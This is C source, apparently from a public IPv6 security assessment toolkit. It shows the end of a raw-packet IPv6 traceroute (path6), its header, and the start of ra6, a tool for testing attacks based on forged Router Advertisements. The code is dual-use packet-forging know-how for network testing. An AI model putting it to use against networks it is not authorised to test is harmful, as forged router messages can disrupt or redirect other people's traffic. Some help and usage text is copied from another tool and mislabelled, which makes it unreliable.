droppacket_f= TRUE; break; } ulhtype= fh->ip6f_nxt; pkt_eh = (struct ip6_eh *) ((char *) fh + sizeof(struct ip6_frag)); } else{ if( ((unsigned char *)pkt_eh + sizeof(struct ip6_eh)) > pkt_end){ droppacket_f=TRUE; break; } ulhtype= pkt_eh->eh_nxt; pkt_eh= (struct ip6_eh *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); } if( (unsigned char *)pkt_eh >= pkt_end){ droppacket_f= TRUE; break; } } if(droppacket_f){ continue; } pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_eh); pkt_tcp= (struct tcp_hdr *) ((char *) pkt_eh); pkt_udp= (struct udp_hdr *) ((char *) pkt_eh); pkt_esp= (struct esp_hdr *) ((char *) pkt_eh); pkt_ah= (struct ah_hdr *) ((char *) pkt_eh); if(ulhtype == IPPROTO_ICMPV6 && pkt_icmp6->icmp6_type == ICMP6_ECHO_REQUEST){ if( (pkt_end - (unsigned char *) pkt_icmp6) < sizeof(struct icmp6_hdr)) continue; if(ntohs(pkt_icmp6->icmp6_data16[0]) != getpid() ) continue; nhop= ntohs(pkt_icmp6->icmp6_data16[1]) >> 8; nprobe= ntohs(pkt_icmp6->icmp6_data16[1]) & 0xff; } else if(probetype == PROBE_TCP && ulhtype == IPPROTO_TCP){ /* Must still verify the TCP checksum */ if( (pkt_end - (unsigned char *) pkt_tcp) < sizeof(struct tcp_hdr)) continue; if( ntohl(pkt_tcp->th_seq) != tcpseq) continue; nhop= (ntohs(pkt_tcp->th_sport) >> 8) - PROBE_PORT_OFFSET; nprobe= ntohs(pkt_tcp->th_sport) & 0xff; } else if(probetype == PROBE_UDP && ulhtype == IPPROTO_UDP){ /* Must still verify the UDP checksum */ if( (pkt_end - (unsigned char *) pkt_udp) < sizeof(struct udp_hdr)) continue; if(ntohs(pkt_udp->uh_ulen) < sizeof(struct udp_hdr)) continue; nhop= (ntohs(pkt_udp->uh_sport) >> 8) - PROBE_PORT_OFFSET; nprobe= ntohs(pkt_udp->uh_sport) & 0xff; #ifdef DEBUG puts("Lei un ICMPv6 Time exceeded"); #endif } else if(probetype == PROBE_ESP && ulhtype == IPPROTO_ESP){ if( (pkt_end - (unsigned char *) pkt_esp) < sizeof(struct esp_hdr)) continue; if(pkt_esp->esp_spi != spi) continue; nhop= ntohl(pkt_esp->esp_seq) >> 16; nprobe= ntohl(pkt_esp->esp_seq) & 0x0000ffff; } else if(probetype == PROBE_AH && ulhtype == IPPROTO_AH){ #ifdef DEBUG puts("Got time exceeeded for AH"); #endif if( (pkt_end - (unsigned char *) pkt_ah) < sizeof(struct ah_hdr)) continue; if(pkt_ah->ah_spi != spi) continue; nhop= ntohl(pkt_ah->ah_seq) >> 16; nprobe= ntohl(pkt_ah->ah_seq) & 0x0000ffff; } } else if( (probetype == PROBE_ESP || probetype == PROBE_AH) && pkt_icmp6->icmp6_type == ICMP6_PARAM_PROB && \ pkt_icmp6->icmp6_code == ICMP6_PARAMPROB_NEXTHEADER){ /* Handle the specific case of ICMPv6 Parameter problem messages for AH and ESP */ nsrc= pkt_ipv6->ip6_src; pkt_ipv6= (struct ip6_hdr *) ((char *) pkt_icmp6 + sizeof(struct icmp6_hdr)); if( ((unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr)) > pkt_end) continue; /* XXX: Should remove the check for everything except AH and ESP */ if(pkt_ipv6->ip6_nxt != IPPROTO_AH && pkt_ipv6->ip6_nxt != IPPROTO_ESP && pkt_ipv6->ip6_nxt != IPPROTO_ICMPV6 && \ pkt_ipv6->ip6_nxt != IPPROTO_TCP && pkt_ipv6->ip6_nxt != IPPROTO_UDP){ pkt_eh= (struct ip6_eh *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); while( ( (unsigned char *)pkt_eh+ MIN_EXT_HLEN) <= pkt_end && pkt_eh->eh_nxt != IPPROTO_ICMPV6 && \ pkt_eh->eh_nxt != IPPROTO_TCP && pkt_eh->eh_nxt != IPPROTO_UDP){ pkt_eh= (struct ip6_eh *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); } if( (unsigned char *)pkt_eh >= pkt_end){ continue; } else{ ulhtype= pkt_eh->eh_nxt; pkt_icmp6= (struct icmp6_hdr *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); pkt_udp= (struct udp_hdr *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); pkt_icmp6 = (struct icmp6_hdr *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); pkt_ah= (struct ah_hdr *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); pkt_esp= (struct esp_hdr *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); } } else{ ulhtype= pkt_ipv6->ip6_nxt; pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_tcp= (struct tcp_hdr *) pkt_icmp6; pkt_udp= (struct udp_hdr *) pkt_icmp6; pkt_ah= (struct ah_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_esp= (struct esp_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); } if(probetype == PROBE_ESP && ulhtype == IPPROTO_ESP){ if( (pkt_end - (unsigned char *) pkt_esp) < sizeof(struct esp_hdr)){ continue; } if(pkt_esp->esp_spi != spi){ continue; } nhop= ntohl(pkt_esp->esp_seq) >> 16; nprobe= ntohl(pkt_esp->esp_seq) & 0x0000ffff; endhost_f=1; } else if(probetype == PROBE_AH && ulhtype == IPPROTO_AH){ if( (pkt_end - (unsigned char *) pkt_ah) < sizeof(struct ah_hdr)){ #ifdef DEBUG puts("Tam"); #endif continue; } if(pkt_ah->ah_spi != spi){ #ifdef DEBUG puts("SPI"); #endif continue; } nhop= ntohl(pkt_ah->ah_seq) >> 16; nprobe= ntohl(pkt_ah->ah_seq) & 0x0000ffff; endhost_f=1; } else continue; } else{ continue; } } else if(probetype == PROBE_TCP && ulhtype == IPPROTO_TCP){ /* Must still verify the TCP checksum -- We do not do it yet */ if( (pkt_end - (unsigned char *) pkt_tcp) < sizeof(struct tcp_hdr)) continue; if(!is_eq_in6_addr(&(pkt_ipv6->ip6_src), &(idata.dstaddr))){ continue; } /* XXX: This check should really take into account the payload size */ if( ntohl(pkt_tcp->th_ack) < tcpseq || ntohl(pkt_tcp->th_ack) > (tcpseq+100000)){ continue; } if(ntohs(pkt_tcp->th_sport) != dstport){ continue; } nhop= (ntohs(pkt_tcp->th_dport) >> 8) - PROBE_PORT_OFFSET; nprobe= ntohs(pkt_tcp->th_dport) & 0xff; nsrc= pkt_ipv6->ip6_src; endhost_f=1; } else if(probetype == PROBE_UDP && ulhtype == IPPROTO_UDP){ /* Must still verify the UDP checksum */ if( (pkt_end - (unsigned char *) pkt_udp) < sizeof(struct udp_hdr)) continue; if(ntohs(pkt_udp->uh_sport) != dstport){ continue; } nprobe= (ntohs(pkt_udp->uh_sport) >> 8) - PROBE_PORT_OFFSET; nhop= ntohs(pkt_udp->uh_sport) & 0x00ff; nsrc= pkt_ipv6->ip6_src; endhost_f=1; } else{ continue; } if(nprobe >= maxprobes){ #ifdef DEBUG printf("Descarte por nprobe mayor o igual que maxprobe (%u >= %u)\n", nprobe, maxprobes); #endif continue; } if(nhop >= maxhops){ #ifdef DEBUG printf("Descarte por nhop mayor o igual que maxhops (%u >= %u)\n", nhop, maxhops); #endif continue; } if(test[nhop][nprobe].received){ #ifdef DEBUG printf("Descarte por (nhop, nprobe) ya habia sido recibido (%u, %u)\n", nhop, nprobe); #endif continue; } if(test[nhop][nprobe].sent == FALSE){ #ifdef DEBUG printf("Descarte por (nhop, nprobe) no habia sido enviado (%u, %u)\n", nhop, nprobe); #endif continue; } test[nhop][nprobe].received= TRUE; /* Record the receive time from the pkthdr timestamp */ test[nhop][nprobe].rtstamp.tv_sec= (pkthdr->ts).tv_sec; test[nhop][nprobe].rtstamp.tv_usec= (pkthdr->ts).tv_usec; test[nhop][nprobe].srcaddr= nsrc; /* If we got a response to a probe packet, allow for an additional probe to be sent */ send_f= TRUE; /* If we received a response from the end host, we artificially change maxhops such that we do not send probes for larger Hop Limits */ if(endhost_f && nhop < maxhops && phop <= nhop) maxhops=nhop+1; endhost_f=0; } } } exit(EXIT_SUCCESS); } /* * Function: usage() * * Prints the syntax of the frag6 tool */ void usage(void){ puts("usage: path6 -i INTERFACE -d DST_ADDR [-S LINK_SRC_ADDR] [-D LINK-DST-ADDR]\n" " [-s SRC_ADDR[/LEN]] [-u DST_OPT_HDR_SIZE]\n" " [-U DST_OPT_U_HDR_SIZE] [-H HBH_OPT_HDR_SIZE] [-P FRAG_SIZE]\n" " [-O FRAG_TYPE] [-o FRAG_OFFSET] [-I FRAG_ID] [-T] [-n]\n" " [-p | -W | -X | -F N_FRAGS] [-l] [-z SECONDS] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the frag6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts( "path6: A versatile IPv6 traceroute\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --link-src-address, -S Link-layer Destination Address\n" " --link-dst-address, -D Link-layer Source Address\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Address\n" " --frag-hdr. -y Fragment Header\n" " --dst-opt-hdr, -u Destination Options Header (Fragmentable Part)\n" " --dst-opt-u-hdr, -U Destination Options Header (Unfragmentable Part)\n" " --hbh-opt-hdr, -H Hop by Hop Options Header\n" " --probe-type, -p Probe type {icmp, tcp, udp, ah, esp}\n" " --payload-size, -P Payload Size\n" " --dst-port, -a Transport-layer Destination Port\n" " --tcp-flags, -X TCP Flags\n" " --rate-limit, -r Rate limit the probe packets\n" " --verbose, -v Be verbose\n" " --help, -h Print help for the path6 tool\n" "\n" "Programmed by Fernando Gont for SI6 Networks (http://www.si6networks.com)\n" "Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ if(idata->type == DLT_EN10MB && !(idata->flags & IFACE_LOOPBACK)){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, (!idata->hsrcaddr_f)?" (automatically selected)":""); /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(ether_ntop(&(idata->hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, (!idata->hdstaddr_f)?" (automatically selected)":""); } if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(idata->dstaddr_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata->srcaddr_f)?" (automatically selected)":"")); } if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s\n", pdstaddr); for(i=0; i 1)?"s":""); } } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; #if defined(__linux__) sll_linux= (struct sll_linux *) buffer; #endif if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(idata->flags != IFACE_LOOPBACK){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #elif defined(__linux__) else if(idata->type == DLT_LINUX_SLL){ sll_linux->sll_pkttype= htons(0x0004); sll_linux->sll_hatype= htons(0xffff); sll_linux->sll_halen= htons(0x0000); sll_linux->sll_protocol= htons(ETHERTYPE_IPV6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(idata->fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+ idata->mtu)){ printf("Unfragmentable part too large for current MTU (%u bytes)\n", idata->mtu); exit(EXIT_FAILURE); } /* We prepare a separate Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ memset(&fraghdr, 0, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } startofprefixes=ptr; } /* * Function: send_probe() * * Send a probe packet */ int send_probe(struct iface_data *idata, unsigned int probetype, unsigned char chop, unsigned char cprobe){ struct tcp_hdr *tcp; struct udp_hdr *udp; struct ah_hdr *ah; struct esp_hdr *esp; struct icmp6_hdr *icmp6; ptr=startofprefixes; ipv6->ip6_hlim= chop+1; if(probetype == PROBE_ICMP6_ECHO){ *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct icmp6_hdr)) > (v6buffer+ idata->max_packet_size)){ puts("Packet too large while inserting ICMPv6 header (should be using Frag. option?)"); exit(EXIT_FAILURE); } icmp6= (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; /* The Identifier field (icmp6_data16[0]) contains the PID of this process (as usual for the ping(8) tool. The "Sequence Number" field (icmp6_data16[1]) encodes the original Hop Limit and the probe number. The probe number is encoded in the upper 8 bits, while the hop limit is encoded in the lower 8 bits. */ icmp6->icmp6_data16[0]= htons(getpid()); icmp6->icmp6_data16[1]= htons( ((uint16_t) chop << 8) + (cprobe & 0xff) ); ptr += sizeof(struct icmp6_hdr); if(rhbytes){ rhleft=rhbytes; if( (ptr + rhleft) > (v6buffer+ idata->max_packet_size)){ puts("Packet Too Large while inserting TCP segment"); exit(EXIT_FAILURE); } while(rhleft>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhleft -= sizeof(uint32_t); } while(rhleft>0){ *(uint8_t *) ptr= (uint8_t) random(); ptr++; rhleft--; } } icmp6->icmp6_cksum = 0; icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); } else if(probetype == PROBE_TCP){ *prev_nh = IPPROTO_TCP; if( (ptr+sizeof(struct tcp_hdr)) > (v6buffer+ idata->max_packet_size)){ puts("Packet too large while inserting ICMPv6 header (should be using Frag. option?)"); exit(EXIT_FAILURE); } tcp= (struct tcp_hdr *) ptr; ptr+= sizeof(struct tcp_hdr); memset(tcp, 0, sizeof(struct tcp_hdr)); /* For TCP, we encode the probe number and the current Hop Limit in the TCP Source Port. The probe number is encoded in the upper eight bits, while the current Hop Limit is encoded in the lower eight bits. A constant "offset" is employed for encoding the probe number, such that the resulting Source Port falls into what is typically known as the dynamic ports range (say, ports larger than 50000). */ tcp->th_sport= htons( (((uint16_t) chop + PROBE_PORT_OFFSET) << 8) + cprobe); tcp->th_dport= htons(dstport); tcp->th_seq = htonl(tcpseq); /* If no flags were specified, we set the ACK bit, since all TCP segments other than SYNs are required to have the ACK bit set. */ tcp->th_ack= htonl((tcpflags & TH_ACK)?random():0); tcp->th_flags= tcpflags; tcp->th_urp= htons(0); tcp->th_win= htons((random() + 1024) & 0x7f00); tcp->th_off= MIN_TCP_HLEN >> 2; if(rhbytes){ rhleft=rhbytes; if( (ptr + rhleft) > (v6buffer+ idata->max_packet_size)){ puts("Packet Too Large while inserting TCP segment"); exit(EXIT_FAILURE); } while(rhleft>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhleft -= sizeof(uint32_t); } while(rhleft>0){ *(uint8_t *) ptr= (uint8_t) random(); ptr++; rhleft--; } } ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); tcp->th_sum= 0; tcp->th_sum = in_chksum(v6buffer, tcp, ptr-((unsigned char *)tcp), IPPROTO_TCP); } else if(probetype == PROBE_UDP){ *prev_nh = IPPROTO_UDP; if( (ptr+sizeof(struct udp_hdr)) > (v6buffer+ idata->max_packet_size)){ puts("Packet too large while inserting ICMPv6 header (should be using Frag. option?)"); exit(EXIT_FAILURE); } udp= (struct udp_hdr *) ptr; ptr+= sizeof(struct udp_hdr); memset(udp, 0, sizeof(struct udp_hdr)); /* For UDP, we encode the current probe number and the current Hop Limit as fr TCP. Namely, we encode the probe number and the current Hop Limit in the TCP Source Port. The probe number is encoded in the upper eight bits, while the current Hop Limit is encoded in the lower eight bits. A constant "offset" is employed for encoding the probe number, such that the resulting Source Port falls into what is typically known as the dynamic ports range (say, ports larger than 50000). */ udp->uh_sport= htons( (((uint16_t) chop + PROBE_PORT_OFFSET) << 8) + cprobe); udp->uh_dport= htons(dstport + (chop*3)+cprobe); if(rhbytes){ rhleft=rhbytes; if( (ptr + rhleft) > (v6buffer+ idata->max_packet_size)){ puts("Packet Too Large while inserting TCP segment"); exit(EXIT_FAILURE); } while(rhleft>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhleft -= sizeof(uint32_t); } while(rhleft>0){ *(uint8_t *) ptr= (uint8_t) random(); ptr++; rhleft--; } } ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); udp->uh_ulen= htons(ptr - (unsigned char *) udp); udp->uh_sum=0; udp->uh_sum = in_chksum(v6buffer, udp, ptr-((unsigned char *)udp), IPPROTO_UDP); } else if(probetype == PROBE_AH){ *prev_nh = IPPROTO_AH; if( (ptr+sizeof(struct ah_hdr)) > (v6buffer+ idata->max_packet_size)){ puts("Packet too large while inserting AH header (should be using Frag. option?)"); exit(EXIT_FAILURE); } ah= (struct ah_hdr *) ptr; ptr+= sizeof(struct ah_hdr); memset(ah, 0, sizeof(struct ah_hdr)); /* For AH, we set the SPI to a random value, and encode the probe numbers in the SEQ */ ah->ah_spi= spi; ah->ah_seq= htonl( (((uint32_t) chop) << 16) + cprobe); ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); ah->ah_nxt= IPPROTO_TCP; /* XXX: This should be changed */ ah->ah_len= sizeof(struct ah_hdr) / 4; /* XXX: Should be modified if we relax the AH format */ } else if(probetype == PROBE_ESP){ *prev_nh = IPPROTO_ESP; if( (ptr+sizeof(struct esp_hdr)) > (v6buffer+ idata->max_packet_size)){ puts("Packet too large while inserting ESP header (should be using Frag. option?)"); exit(EXIT_FAILURE); } esp= (struct esp_hdr *) ptr; ptr+= sizeof(struct esp_hdr); memset(esp, 0, sizeof(struct esp_hdr)); /* For ESP, we set the SPI to a random value, and encode the probe numbers in the SEQ */ esp->esp_spi= spi; esp->esp_seq= htonl( (((uint32_t) chop) << 16) + cprobe); ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); } if(!idata->fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(-1); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); return(-1); } return(0); } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + idata->linkhsize); fptrend = fptr + idata->linkhsize+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - idata->linkhsize); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } /* Sending fragments */ return(0); } /* Sending fragmented datagram */ } ipv6toolkit-2.0+ds.1/tools/path6.h000066400000000000000000000005571254360455000167540ustar00rootroot00000000000000/* * Header file for the path6 tool * */ #define PROBE_ICMP6_ECHO 1 #define PROBE_TCP 3 #define PROBE_UDP 4 #define PROBE_AH 5 #define PROBE_ESP 6 #define PROBE_PORT_OFFSET 0x00c4 #define PROBE_TIMEOUT 4 struct probe{ unsigned char sent; unsigned char received; struct timeval rtstamp; struct timeval ststamp; struct in6_addr srcaddr; }; ipv6toolkit-2.0+ds.1/tools/ra6.c000066400000000000000000001675601254360455000164250ustar00rootroot00000000000000/* * ra6: A security assessment tool for attack vectors based on * ICMPv6 Router Advertisement messages * * Copyright (C) 2009-2015 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * * Build with: make ra6 * * The libpcap library must be previously installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "ra6.h" #include "ipv6toolkit.h" #include "libipv6.h" void init_packet_data(struct iface_data *); void send_packet(struct iface_data *, const u_char *); void usage(void); void print_help(void); void print_attack_info(struct iface_data *); struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct in6_addr *pkt_ipv6addr; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; char all_nodes_addr[]= ALL_NODES_MULTICAST_ADDR; unsigned char buffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *v6buffer, *ptr, *startofprefixes, *ptrhdr, *ptrhdrend; unsigned char *fragpart, *fptr, *fptrend, *ptrend; struct ip6_hdr *ipv6, *pkt_ipv6, *fipv6; struct nd_router_advert *ra; struct nd_router_solicit *pkt_rs; struct nd_opt_rdnss_l *dnsopt; struct ether_header *ethernet, *pkt_ether; struct nd_opt_mtu *mtuopt; struct nd_opt_slla *sllaopt; struct nd_opt_prefix_info *prefixopt; struct nd_opt_route_info_l *routeopt; char *lasts, *rpref, *endptr; size_t nw; uint16_t lifetime; uint32_t reachable; uint32_t retrans; uint8_t curhop, hoplimit; char preference=0, prefbits=0; unsigned int nprefixes=0, nroutes=0, nfrags=0; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; unsigned char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], nfrags, fragsize, m, pad; unsigned char *prev_nh, *startoffragment; struct ip6_frag fraghdr, *fh; unsigned long ul_res, ul_val; unsigned int i, j, startrand, sources, nsources, prefixes, routes, mtus; unsigned int nfloodp, nfloodr, endrand; unsigned int nfloodda, nflooddoa, nsleep; uint32_t mask; uint8_t prefixlen[MAX_PREFIX_OPTION]; uint32_t prefixvalid[MAX_PREFIX_OPTION]; uint32_t prefixpref[MAX_PREFIX_OPTION]; struct in6_addr prefix[MAX_PREFIX_OPTION]; uint8_t prefixflags[MAX_PREFIX_OPTION]; struct in6_addr route[MAX_ROUTE_OPTION]; uint8_t routelen[MAX_ROUTE_OPTION]; uint32_t routelife[MAX_ROUTE_OPTION]; uint8_t routepref[MAX_ROUTE_OPTION]; struct in6_addr rdnss[MAX_RDNSS_OPTION][MAX_RDNSS_OPT_ADDRS]; uint32_t rdnsslife[MAX_RDNSS_OPTION]; unsigned int nrdnss=0, dnsopts; unsigned int nrdnssopt[MAX_RDNSS_OPTION]; int smaxaddrs; uint16_t mtu[MAX_MTU_OPTION]; unsigned int nmtu=0; struct ether_addr linkaddr[MAX_SLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *pref; char *preflen; char *prefvalid; char *prefpref; char *prefflags; char *charptr; char plinkaddr[ETHER_ADDR_PLEN], phsrcaddr[ETHER_ADDR_PLEN], phdstaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pprefix[INET6_ADDRSTRLEN]; char pv6addr[INET6_ADDRSTRLEN]; /* Flags used for option processing */ unsigned char managed_f=0, other_f=0, home_f=0, proxy_f=0; unsigned char mtuopt_f=0, sllopt_f=0, sllopta_f=0, prefopt_f=0, hoplimit_f=0; unsigned char listen_f = 0, floodp_f=0, floods_f=0, floodr_f=0, multicastdst_f=0, floodd_f=0; unsigned char loop_f=0, sleep_f=0, accepted_f=0, newdata_f=0; struct iface_data idata; struct filters filters; int main(int argc, char **argv){ extern char *optarg; int r, sel; fd_set sset, rset; #if defined(sun) || defined(__sun) || defined(__linux__) struct timeval timeout; #endif struct target_ipv6 targetipv6; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"curhop", required_argument, 0, 'c'}, {"lifetime", required_argument, 0, 't'}, {"reachable", required_argument, 0, 'r'}, {"retrans", required_argument, 0, 'x'}, {"managed", no_argument, 0, 'm'}, {"other", no_argument, 0, 'o'}, {"home-agent", no_argument, 0, 'a'}, {"nd-proxy", no_argument, 0, 'q'}, {"preference", required_argument, 0, 'p'}, {"src-link-opt", required_argument, 0, 'E'}, {"add-slla-opt", no_argument, 0, 'e'}, {"prefix-opt", required_argument, 0, 'P'}, {"route-opt", required_argument, 0, 'R'}, {"mtu-opt", required_argument, 0, 'M'}, {"rdnss-opt", required_argument, 0, 'N'}, {"link-src-address", required_argument, 0, 'S'}, {"link-dst-address", 